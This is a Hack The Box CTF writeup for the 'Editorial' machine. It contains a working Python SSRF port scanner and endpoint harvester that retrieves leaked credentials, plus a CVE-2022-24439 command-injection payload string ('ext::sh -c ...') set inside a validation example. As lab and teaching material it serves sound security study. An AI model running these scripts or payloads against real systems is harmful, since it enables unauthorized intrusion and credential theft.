© 2025 sk8thing.dev

Hack The Box - Editorial writeup

22 October 2024
2 min read
Tags: CTF Writeup, Hack The Box, Machine, Linux

Nmap scan

...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMApl7gtas1JLYVJ1BwP3Kpc6oXk6sp2JyCHM37ULGN+DRZ4kw2BBqO/yozkui+j1Yma1wnYsxv0oVYhjGeJavM=
|   256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXtxiT4ZZTGZX4222Zer7f/kAWwdCWM/rGzRrGVZhYx
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...

Only two open ports, 22 (SSH) and 80 (HTTP), so the initial foothold will most likely come from a web vulnerability.

Port 80

On the website hosted on port 80, I noticed the Publish with Us page, which has a file upload feature. I attempted to upload a PHP reverse shell; however, after opening the image preview, I found that the file had been renamed and its extension stripped.

HTB Editorial reverse shell preview

HTB Editorial reverse shell attempt

HTB Editorial reverse shell renamed

Next, I intercepted the preview request with Burp Suite to understand what was going on. The request carries the location of the image, so I pointed it at my own machine and set up a Python HTTP server to receive the application's outbound request.

HTB Editorial HTTP server upload

Submitting http://localhost:80 as the image location returned the default preview icon. The web app fetches the image server-side, and when that fetch fails it falls back to the default icon. In other words, the preview feature is a server-side request forgery (SSRF) primitive, and whether or not the fallback icon comes back tells me whether a given URL was reachable from the server.

HTB Editorial localhost upload

This made me think there was another app listening on an internal port, so I started scanning ports through the preview request with Burp Suite's Turbo Intruder, looking for any response that differs from the default-icon fallback.

HTB Editorial turbo intruder

As I suspected, internal port 5000 is open: instead of the fallback icon, the preview returns a file.

HTB Editorial internal port 5000

I downloaded the file; it describes the available API endpoints.

{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}
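
The port scan through the preview request and the walk over the endpoints listed in the metadata document both reduce to the same thing: make the app fetch an internal URL and look at what comes back. The script below is an added example, not code from the writeup or the box; the preview endpoint (/upload-cover), the form field name (bookurl) and the two-step "POST, then GET the saved copy" flow are assumptions and must be adjusted to what Burp shows. The transport is injectable, so a constructed stand-in for the target (only port 5000 answers) lets the whole thing run offline, and the embedded metadata is an excerpt of the document shown above.

```python
import json
import urllib.parse
import urllib.request

# Assumptions (not from the writeup): the preview form's endpoint and the
# field that carries the image URL. Adjust both to what Burp shows.
PREVIEW_URL = "http://editorial.htb/upload-cover"
URL_FIELD = "bookurl"


def default_transport(internal_url):
    """Make the app fetch internal_url and return what it retrieved.

    Assumed two-step flow: POST the preview form, the app answers with the
    path of the saved copy, then GET that path. Needs network access.
    """
    data = urllib.parse.urlencode({URL_FIELD: internal_url}).encode()
    req = urllib.request.Request(PREVIEW_URL, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        saved_path = resp.read().decode().strip()
    saved_url = urllib.parse.urljoin(PREVIEW_URL, saved_path)
    with urllib.request.urlopen(saved_url, timeout=10) as resp:
        return resp.read()


def scan_internal_ports(ports, transport=default_transport, baseline_port=1):
    """Return the ports whose SSRF response differs from a known-closed port.

    The app falls back to a default icon whenever its fetch fails, so the
    body for a closed port is the baseline; anything else means something
    answered on that port.
    """
    baseline = transport(f"http://127.0.0.1:{baseline_port}")
    return [p for p in ports if transport(f"http://127.0.0.1:{p}") != baseline]


def list_endpoints(metadata):
    """Flatten the /api/latest/metadata document into (name, method, path)."""
    found = []
    for group in metadata.values():            # "messages", "version", ...
        for item in group:
            for name, spec in item.items():
                found.append((name, spec["methods"], spec["endpoint"]))
    return found


def pull_endpoints(metadata, transport=default_transport, port=5000):
    """Fetch every GET endpoint listed in metadata through the SSRF."""
    results = {}
    for _name, method, path in list_endpoints(metadata):
        if method.upper() != "GET":
            continue
        results[path] = transport(f"http://127.0.0.1:{port}{path}")
    return results


# Excerpt of the metadata document shown above, embedded so the
# enumeration part runs offline.
METADATA = {
    "messages": [
        {"new_authors": {
            "description": "Retrieve the welcome message sended to our new authors.",
            "endpoint": "/api/latest/metadata/messages/authors",
            "methods": "GET"}},
    ],
    "version": [
        {"latest": {
            "description": "Retrieve the last version of api.",
            "endpoint": "/api/latest/metadata",
            "methods": "GET"}},
    ],
}


def fake_transport(internal_url):
    """Constructed stand-in for the target: only port 5000 answers."""
    parsed = urllib.parse.urlsplit(internal_url)
    if parsed.port != 5000:
        return b"<default preview icon>"       # fallback for closed ports
    if parsed.path in ("", "/", "/api/latest/metadata"):
        return json.dumps(METADATA).encode()
    return b"Welcome to the team! Username: <redacted> Password: <redacted>"


if __name__ == "__main__":
    print("open:", scan_internal_ports(range(1, 10001), transport=fake_transport))
    for path, body in pull_endpoints(METADATA, transport=fake_transport).items():
        print(path, "->", body[:60])
```

Against the real target, swap fake_transport for default_transport (or a requests-based equivalent that reuses the session Burp captured) and keep the baseline port at one you have confirmed is closed; if the app ever caches the saved copy by URL, add a throwaway query string per request so each port gets a fresh fetch.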

/api/latest/metadata/messages/authors was particularly useful, since it contained some credentials.

Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.

Your login credentials for our internal forum and authors site are:
Username: <redacted>
Password: <redacted>
Please be sure to change your password as soon as possible for security purposes.
Don't hesitate to reach out if you have any questions or ideas - we're always here to support you.

Best regards, Editorial Tiempo Arriba Team.

User flag

I logged into the machine over SSH with these credentials and claimed the user flag.

HTB Editorial user flag

Root flag

I explored the /apps directory and discovered a .git repository, so I went through its commit history for clues that could lead to privilege escalation. Eventually I found credentials for the prod user.

HTB Editorial prod credentials

I logged in as the prod user, and things immediately looked promising: the user has limited sudo privileges.

HTB Editorial sudo privileges

At this point I hit a rabbit hole, spending a long time trying to exploit the script itself to gain root, without success. While reviewing the installed package versions, I discovered that GitPython 3.1.29 is installed, which is vulnerable to CVE-2022-24439 (fixed in 3.1.30): a clone URL beginning with ext:: is passed straight to git, whose ext remote helper executes the rest of the URL as a shell command. This vulnerability finally allowed me to claim the root flag.
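
To make the root cause concrete, here is an added example (not code from the box or from GitPython) of the vulnerable call pattern next to a hardened one. The allowed scheme list and the sample URLs are assumptions for illustration; the payload shape "ext::sh -c touch% /tmp/pwned" is the documented form of the CVE-2022-24439 trigger, where git-remote-ext treats "% " as an escaped space so the command reaches sh as one argument. GitPython is imported lazily, so the URL checker runs without it installed.

```python
import re
from urllib.parse import urlsplit

# Schemes a production clone job should ever need (assumption for this example).
ALLOWED_SCHEMES = {"https", "ssh"}

# "<helper>::<rest>" tells git to run the remote helper git-remote-<helper>;
# the ext helper runs <rest> as a command ("% " is an escaped space).
REMOTE_HELPER = re.compile(r"^[A-Za-z0-9_.+-]+::")


def check_clone_url(url):
    """Return None if url is acceptable, otherwise the reason it is rejected."""
    if REMOTE_HELPER.match(url):
        return "remote-helper syntax (ext::, fd::, ...) is not allowed"
    if url.startswith("-"):
        return "looks like a command-line option"
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not in {sorted(ALLOWED_SCHEMES)}"
    if not parts.netloc:
        return "missing host"
    return None


def vulnerable_clone(url, dest):
    """The pattern CVE-2022-24439 hits: user input goes straight into clone.

    With GitPython < 3.1.30 (3.1.29 on the box) nothing here stops
    url == "ext::sh -c touch% /tmp/pwned" from running the command.
    """
    from git import Repo  # GitPython; lazy import so the checker runs without it
    return Repo.clone_from(url, dest)


def safe_clone(url, dest):
    """Validate first, then tell git itself which transports may be used."""
    reason = check_clone_url(url)
    if reason is not None:
        raise ValueError(f"refusing to clone {url!r}: {reason}")
    from git import Repo
    # GIT_ALLOW_PROTOCOL is an explicit allow-list honoured by git, so even a
    # URL that slips past the checker cannot reach the ext helper.
    return Repo.clone_from(url, dest, env={"GIT_ALLOW_PROTOCOL": "https:ssh"})


if __name__ == "__main__":
    for candidate in [
        "https://github.com/gitpython-developers/GitPython",
        "ssh://git@internal.example/prod/app.git",
        "ext::sh -c touch% /tmp/pwned",        # CVE-2022-24439 payload shape
        "fd::17",
        "--upload-pack=touch /tmp/pwned",
        "/opt/some/local/repo",
    ]:
        print(f"{candidate!r:50} -> {check_clone_url(candidate) or 'ok'}")
```

Two caveats worth knowing before relying on either side of this. First, since git 2.12 the ext transport is disabled by default (protocol.ext.allow is "never"), so the payload only fires where that policy has been relaxed or an older git is in use; the explicit GIT_ALLOW_PROTOCOL allow-list removes the dependence on whatever the system config happens to say. Second, the checker deliberately rejects scp-style "git@host:org/repo.git" URLs because they carry no scheme to allow-list; use the ssh:// form instead. GitPython 3.1.30 and later also refuse ext:: URLs unless allow_unsafe_protocols=True is passed, which is the upstream fix, but validating before the call is still the right place to stop the input.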

HTB Editorial root flag